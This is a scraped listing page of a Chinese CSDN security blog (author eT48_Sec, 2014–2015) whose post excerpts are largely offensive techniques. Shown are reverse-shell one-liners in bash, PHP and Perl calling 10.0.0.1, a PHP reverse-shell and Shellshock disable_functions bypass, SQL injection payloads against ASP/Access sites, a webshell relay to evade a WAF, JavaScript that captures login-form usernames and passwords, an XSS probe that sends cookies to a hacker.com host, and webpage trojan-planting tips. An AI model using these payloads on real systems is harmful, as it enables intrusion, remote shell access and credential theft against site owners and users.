自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

eT48_Sec

每天只有24小时,所以你需要提高工作效率。

  • 博客(43)
  • 收藏
  • 关注

转载 利用systeminfo命令查找可用的windows提权EXP

利用systeminfo命令查找可用的windows提权EXP,输出的即为未打补丁的漏洞。文章根据网络上的相关内容做了一点修改(更新)systeminfo>tmp.txt&(for /f %i in (MS.txt) do @type tmp.txt|@find /i "%i"||@echo %i)&del /f /q tmp.txtMS.txt中的内容为:

2015-03-30 17:38:52 4664

原创 使用sqlmap 代替access 注入中转

背景:测试站点是ASP的程序,经测试 shownews.asp?id=61存在注入GET方法 shownews.asp?id=61 and 4>1 返回警告改成POST方法,仍然出现警告最后,测试cookie注入,如下图,在控制台提交document.cookie="id="+escape("61 and 4>1"),新增cookie项id,然后再次访问shownews.asp

2015-03-14 23:40:35 1609

原创 access 偏移注入 案例

news.asp?id=3039 and 4>8 union select 1,2,3,4,* from manage_admin as a inner join manage_admin as b on a.id=b.id看个案例就明白是什么意思了先是背景news.asp?id=3306 存在注入然后通过 order by 可知查询返回 12 列通过数据表字典跑出管理员表 m

2015-03-14 20:44:42 1252

原创 一条命令引发的思考

这条命令是php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");'作用是反弹一个交互式的shell代码看得不太懂,所以很有必要了解一下。-i interactive Force the shell to behave interactively.文件描述符0       stdin

2015-02-10 22:14:24 461

转载 php-reverse-shell

功能:返回一个交互式的shell使用:先修改脚本中的两个变量 $ip 和 $port 为自己所需的。然后本地监听 $port 。例如:$ip = '192.168.1.111'; // CHANGE THIS$port = 13123; // CHANGE THISnc -v -l -p 13123然后上传并在浏览器中打开该PHP脚本文件。效果图:源代码

2015-02-10 18:40:39 1796

转载 Reverse Shell Cheat Sheet

1.bashbash -i >& /dev/tcp/10.0.0.1/8080 0>&12.perlperl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){ope

2015-02-09 22:03:35 786

转载 反弹 shell 脚本

从大马里面提取出来的,分别用perl 和 C实现 。保存为reverse_exp,然后执行perl ./reverse_exp 192.168.1.111 13123。在192.168.1.111 上执行 nc -v -l -p 13123#!/usr/bin/perluse Socket;$cmd= "lynx";$system= 'echo "`uname -a`

2015-02-09 21:42:08 629

转载 PHP 5.x Shellshock Exploit (bypass disable_functions)

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)# Google Dork: none# Date: 10/31/2014# Exploit Author: Ryan King (Starfall)# Vendor Homepage: http://php.net# Software Link:

2015-02-07 22:46:03 855

原创 PHP disable_function与safe mode

我只想执行操作系统命令,可是有disable_functions 和 安全模式的阻碍。disable_functions本指令允许你基于安全原因禁止某些函数,从 PHP 4.0.1 起可用。其默认值为空,接受逗号分隔的函数名列表作为参数。 disable_functions 不受安全模式的影响。 本指令只能设置在 php.ini 中。可以通过以下这行代码获取disable_func

2015-02-07 21:00:35 1476

原创 bypass open_basedir

在了解symlink() bypass open_basedir 的原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。<?php/*titile: bypass open_basedirauth: eT48*/header("Conten-type:text/html; charset:udf-8");error_repor

2015-02-06 16:54:01 917

原创 PHP扫描内网存活主机

直接上代码<?PHPheader('Content-Type: text/html; charset=utf-8'); error_reporting(0); function ping($host, $timeout = 1) { $package = "\x08\x00\x7d\x4b\x00\x00\x00\x00PingHost"; $socket = socket_

2015-02-01 22:27:28 1906

转载 菜刀杀狗

中转是一种思路,把狗拦截的关键字以一种等效的方式替换为其他的。<?php $webshell="http://www.example.com/1.php";//把这里改成你的shell地址 $webshell=$webshell."?&1141056911=base64_decode"; $da=$_POST; $data = $da; @$data=str_replace("ba

2015-01-29 21:15:51 658

原创 通过“Robots <META> tag”防止搜索引擎收录网页后门

这是我这b374k.php上看到的。我们通过“Robots tag”来告诉搜索引擎spider不要索引页面的内容以及不扫描页面中的链接。这样他人就不能通过搜索关键字的方式找到我们的网页后门了。还可以再加一个“noarchive”属性防止搜索引擎保存网页的快照。参考:http://www.robotstxt.org/meta.html           http:

2015-01-27 20:38:01 539

转载 bypass waf 进行post注入

原标题:轻松绕各种WAF的POST注入、跨站防御(比如安全狗) 轻松绕各种WAF的POST注入、跨站防御(比如安全狗) File: ID: 转载自:http:/

2015-01-13 21:13:40 618

原创 php-文件上传

简单的编程,只为学习PHP。<?phpheader("Content-Type:text/html; charset=utf-8");error_reporting(0);print<<<END文件上传实例END;$uppath=$_SERVER["SCRIPT_FILENAME"];$uppath=dirname($uppath);$uppath =

2015-01-13 16:01:11 440

原创 php-批量端口扫描

phpwebshell端口扫描<?php/*auth: eT48blog: http://blog.csdn.net/et48_sec*/header('Content-Type: text/html; charset=utf-8');error_reporting(0);print<<<END ip: port: END;$timeout=3;fun

2015-01-13 14:40:36 1133

原创 PHP实现目录遍历

目录遍历是文件管理的基础,在此基础上增加删除,新建,编辑,下载,浏览就更好了。<?phpheader('Content-Type:text/html; charset=gb2312');error_reporting(0);$dir=$_GET['dir'];if(is_dir($dir)){echo "Index   of  ".realpath($dir)."";ech

2015-01-12 16:34:51 576

原创 MSSQL-xp_cmdshell 的利用

一.关于xp_cmdshellxp_cmdshell是用于执行Windows命令的一个扩展存储过程。xp_cmdshell 生成的 Windows 进程与 SQL Server 服务帐户具有相同的安全权限。 自SQL Server 2000后,默认情况下,xp_cmdshell 选项在新安装的软件上处于禁用状态,但是可以运行 sp_configure 系统存储过程来启用它。二.xp

2015-01-08 12:48:48 1324

转载 symlink() open_basedir bypass 原理分析

之前在网上看到相关php open_basedir bypass的文章都不是很理解,看了原作者的文章后总算明白了。原文:http://cxsecurity.com/issue/WLB-2009110068ok,先来了解一下什么是open_basedir。open_basedir 将 PHP 所能打开的文件限制在指定的目录树,包括文件本身。本指令不受安全模式打开或者关闭的影响。

2015-01-05 22:47:05 1540

原创 使用include实现php一句话

我是菜牛各位看官轻喷。PHP一句话主要实现的是,动态执行PHP代码。PHP小马主要实现的是,文件上传。PHP大马主要实现的是,提权。include 语句包含并运行指定文件。 <?php//服务端if(!empty($_POST['code'])){$code=trim($_POST['code']);$handle=fopen('cmd.txt','w

2015-01-05 15:57:03 842

转载 php LFI读php文件源码以及直接webshell

小菜无意中看到大牛的一篇文章,看后觉得很受益,所以就转载过来了。之前只知道“include”语句是包含并运行指定文件,遇到的话也只是找上传点然后getshell。看来这篇文章后,才知道还可以读取php文件的源代码,这样的话,就可以读取网站的配置文件了。而且在allow_url_include=On 的情况下,还可以直接执行php代码。原文:http://hi.baidu.com/c

2015-01-05 14:13:45 1169

原创 PHP小马

http://xiaojianke.blog.163.com是我原来的博客,工作后换成了C博客,这里吐槽一下网易博客太差了。看到网上那么多PHP小马,我也来自己写一个,练习PHP编程。<?phperror_reporting(E_ERROR);header('Content-Type:text/html; charset=utf-8');$path=getcwd();$pe

2015-01-04 21:18:09 1905 1

原创 Encoding Web Shells in PNG IDAT chunks

原文在这里:https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/很老的一篇文章,大概说的是在png图片里面隐藏php一句话代码。现在看来,实现也不难,使用copy命令即可。之所以还写出来是为了练习PHP编程。还可以参考:https://bugscollector.com/tricks

2015-01-04 20:59:53 1401

转载 Reading files in MySQL with file_priv = no

好吧,我是在法客上看到园长发的这篇文章,然后追到乌云,然后追到源头,觉得很是实用,所以就贴出来了。All we know for reading files in MySQL we need file_priv permission.But there is way for reading files without this permission.We can creat

2015-01-04 17:16:55 563

转载 MYSQL-执行“load data local infile”报错“The used command is not allowed with this MySQL version”

MYSQL在执行“load data local infile”的时候报错“The used command is not allowed with this MySQL version”,本人所用的版本是 “5.5.38-0+wheezy1”,然后在网上找到了下面这篇文章,得到的解决方案。在部署在不同机器上的mysql数据库之间导数据时,load data infile是一个很高

2015-01-04 16:52:34 6276 1

原创 通过UA判断客户端的操作系统类型

我们可以通过一个javascript脚本获取客户端返回的User-Agent,然后根据其中的信息判断客户端使用什么操作系统。Windows系列Windows NT俗称NT 5.0Windows 2000NT 5.1Windows XPNT 5.2Windows XPWindows 2003NT6.0

2015-01-03 20:26:00 2609

转载 使用meta标签指定双核浏览器以IE浏览器内核渲染网页

“双核”浏览器,顾名思义,就是浏览器内部包含两个渲染内核。目前大多数“双核”浏览器内部的两个内核分别是IE内核和WebKit内核。与双核处理器不同的是,“双核”浏览器的两个内核并不能同时为一个网页进行渲染排版工作,而是根据我们的需要,选择两者之中更适合当前网页的内核来进行渲染排版。IE内核主要用于兼容“老一辈”的网页,使其能够正常显示;WebKit内核则用于渲染“新一代”的网页,从而发挥出更快的显

2015-01-03 20:05:28 3161

原创 Javascript-截获登录表单的用户名和密码-v1.5

version 1.0 需要代码添加到登陆表单的后面,才可以正常使用。经完善后,可以添加在任何位置,比如 标签里,而不必添加在登录表单的后面。sniffer.js/*author: eT48blog: http://blog.csdn.net/et48_secversion: v1.5*/document.onreadystatechange = function()

2014-12-28 21:08:10 878

原创 Javascript-截获登录表单的用户名和密码-v1.0

一段截获登录表单的用户名和密码的Javascript脚本。拿下了网站的数据库却破不了MD5的情况下,可以尝试利用这段脚本截获登录表单的用户名和密码。这段脚本需要调用到DOM,所以应把这段代码插在登录表单之后。sniffer.js/*author: eT48blog: http://blog.csdn.net/et48_secversion: 1.0*/va

2014-12-28 18:45:28 1108

原创 几条命令-可能有些古董

几条命令,可能有些古董。ipconfigping 192.168.1.104nc -v -z -w 5 192.168.1.104 139 445net use \\192.168.1.104\ipc$ "test" /user:"test"copy hack.bat \\192.168.1.104\admin$net time \\192.168.1.104at

2014-12-27 22:28:53 519

原创 初学网页挂马

我觉得网页挂马要考虑两个因素:隐蔽性、成功率。我们只需保证浏览器加载并执行我们构造的特殊网页即可,这样的方法有许多。方法一,我们可以在首页加入以下这行代码。方法二,我们可以在首页加入以下这行代码。horse.js可以这样写:new Image.src="http://www.hacker.com/horse.html";或者d

2014-12-27 18:25:33 574

原创 MS14-065 漏洞播报

原文:https://technet.microsoft.com/zh-CN/library/security/ms14-065.aspx当用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。 成功利用这些漏洞的攻击者可以获得与当前用户相同的用户权限。Windows 7(32 位/64位)Service Pack 1 上的 IE8、

2014-12-27 17:40:27 664

原创 XSS信息刺探脚本

重复造轮子,是的,我在学习编程。该 javascript 脚本主要收集客户端用户的 User_Agent、Cookie、Domain、Flash_Version。接收信息的文件由PHP编写,同时增加客户端的IP和访问时间。xss_probe.js/*xss_probeby eT48*/var http_server = "http://www.hacker.c

2014-12-27 16:14:34 622

原创 kali-linux 安装Flash

在虚拟机安装好kali 后就想找部电影看的,可以提示“由于您未安装flash播放器视频无法播放,点击这里安装”。好吧,点进去(跳转到Flash官网http://get.adobe.com/flashplayer/),选择.tar.gz for other linux,然后点击右下角的按钮进行下载。来到下载文件的目录,解压。tar -zxvf install_flash_pl

2014-12-26 22:48:41 1412

转载 Fix "/dev/sda1 unexpected inconsistency, run fsck manually"

我的 kali-linux 是安装在 vmware 上的,今天启动的时候进不了图形桌面,提示“/dev/sda1 unexpected inconsistency, run fsck manually”,然后输入startx 命令却提示“startx command not found”,好吧菜鸟就去百度了。然后找到这篇文章:http://blog.csdn.net/forever_k

2014-12-26 22:12:55 1559

转载 Could not apply the stored configuration for monitors

玩 kali-linux 的过程中遇到不少问题,还好网上都能找到解决的方案。原文:http://www.xiebiao.com/blog/?p=806今天在折腾kali 的时候出现了类似以下的画面。我是以root 登录的,按照原作者的说法删除掉 /root/.config/monitors.xml ,然后重启就正常了。

2014-12-26 21:37:28 413

转载 Kali-linux安装之后的简单设置

完整版请参考原文:http://xiao106347.blog.163.com/blog/static/215992078201342410347137/1.更新软件源:修改sources.list文件:leafpad /etc/apt/sources.list然后选择添加以下适合自己较快的源(可自由选择,不一定要全部):#官方源deb http

2014-12-25 16:05:42 499

转载 Fix metasploit " postgresql selected, no connection"

新手遇到的问题就是多,不要紧有google在。原文地址:https://forums.kali.org/showthread.php?22485-No-connection-to-Database-for-metasploit-after-update-solutionHi there,Connection to the postgresql database does

2014-12-25 15:27:11 2771

转载 Fix metasploit “Database not connected or cache not built”

刚开始玩kali-linux的时候也碰到过这个问题,然后google找到了解决的方案,转载回来。原文地址:http://www.dailysecurity.net/2013/05/11/fix-metasploit-database-not-connected-or-cache-not-built/This is a short post explaining how to dea

2014-12-25 15:07:43 841

原创 Metasploit-MSSQL渗透-实战篇

Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。而Metasploit是Kali Linux中的一款开源安全漏洞检测工具。打开metasploit的控制台终端:先使用NMAP对目标进行端口扫描,目标的IP地址已经打码,不对外公开。从扫描结果中,我们得知目标对外开放了1433端口对应于ms

2014-12-24 15:24:26 13264 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除